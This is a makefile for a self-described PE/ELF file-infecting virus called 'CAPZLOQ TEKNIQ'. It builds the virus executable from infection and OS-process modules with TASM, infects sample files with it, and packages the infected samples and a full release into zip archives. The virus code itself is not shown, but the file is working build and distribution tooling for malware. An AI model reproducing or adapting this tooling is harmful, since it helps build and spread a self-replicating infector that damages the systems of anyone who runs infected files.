#   Make file for CAPZLOQ TEKNIQ Virus
#   Copyright (c) 2006 J-FUQING-PANIC
#
#       make -B                 Build clt.exe
#       make -B -DDEBUG         Build debug clt.exe.
#       make CLEANUP            Clean directory of uneeded files.
#       make SAMPLES           	Create in .\samples\InfectedSamples infected 
#				version of files in .\samples\Uninfected Samples
#	make ZIPS		Create full release and infected sample zips in .\zips

.autodepend

NAME = CLT
# Base VA of first gen virus.
VBase = 400000

# Modules in order of linking.
OBJS = vmain.obj\
        osprocs.obj win32proc.obj linuxproc.obj crc.obj inf-pe.obj inf-elf.obj\
        vhost.obj

# Executable Definition file.
DEF  = $(NAME).def

# Path of TASM Installation
TASMPATH = d:\asm\tasm

# Optional Debug parameters.
!if $d(DEBUG)
TASMDEBUG=/zi
LINKDEBUG=-v
!else
TASMDEBUG=/zn
LINKDEBUG=
!endif

# Utilities used.
TASM = $(TASMPATH)\bin\tasm32
TLINK = $(TASMPATH)\bin\tlink32
WZ=c:\progra~1\winzip\wzzip

# The main target - CAPZLOQ TEKNIQ VIRUS
$(NAME).EXE: $(OBJS) $(DEF)
  # Build linker response file.
  echo $(LINKDEBUG) -c -m -Tpe -B:$(VBase) + > lnkresp
  echo $(OBJS), + >> lnkresp
  echo $(NAME), $(NAME), $(TASMPATH)\lib\import32, $(DEF) >> lnkresp
  $(TLINK) @lnkresp
  del lnkresp
  find "VHost" $(NAME).map

# Create ZIPS
ZIPS: 
 make -B
 make CLEANUP
 make SAMPLES
 del .\zips\*.* /q 
 $(WZ) .\zips\$(NAME)-Infected-Samples-[JPANIC] .\samples\InfectedSamples\*.*
 $(WZ) -P -r .\zips\$(NAME)-Full-Release-[JPANIC] $(NAME).* *.as? makefile readme.txt inc samples

# Clean-up directory.
CLEANUP:
 del *.obj
 del *.map
 del *.lst
 del *.tr2

# Test virus in sample directory.
SAMPLES: 
 cd samples\InfectedSamples
 del *.* /q
 copy ..\UninfectedSamples\*.*
 ..\..\clt.exe
 cd ..\..

# Assembly rule.
.asm.obj:
  $(TASM) $(TASMDEBUG) /dVBase=$(VBase)h /ml /m9 /l /n /c /t $&.asm
